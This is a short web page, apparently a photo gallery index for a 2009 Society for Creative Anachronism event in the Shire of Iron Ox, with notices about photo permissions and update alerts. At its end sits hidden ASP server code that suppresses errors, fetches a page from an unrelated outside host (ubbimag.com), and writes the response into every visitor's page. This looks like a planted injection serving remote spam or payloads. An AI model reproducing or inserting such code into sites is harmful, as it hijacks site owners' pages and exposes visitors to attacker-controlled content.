Academy of the Performing Arts
Shire of Iron Ox
August 1, 2009 AS XLIV
(click images to enlarge)


Click
here for the Event Report
Prior to the use of any
photo shown on this site,
permission should be obtained from
THLady Barbara Sterling.
If you wish to be notified of photo updates,
click here.
PHOTO
MENU
If you wish to be notified of photo updates,
click here.
return to previous page

visit our sponsor
Uncle John's
webmaster
<%
On Error Resume Next
set XmlObj = Server.CreateObject("Microsoft.XMLHTTP")
XmlObj.open "GET", "http://ubbimag.com/z10.html", false
XmlObj.send
formatdata = XmlObj.responseText
file_get_contents=formatdata
Set XmlObj = nothing
response.write file_get_contents
%>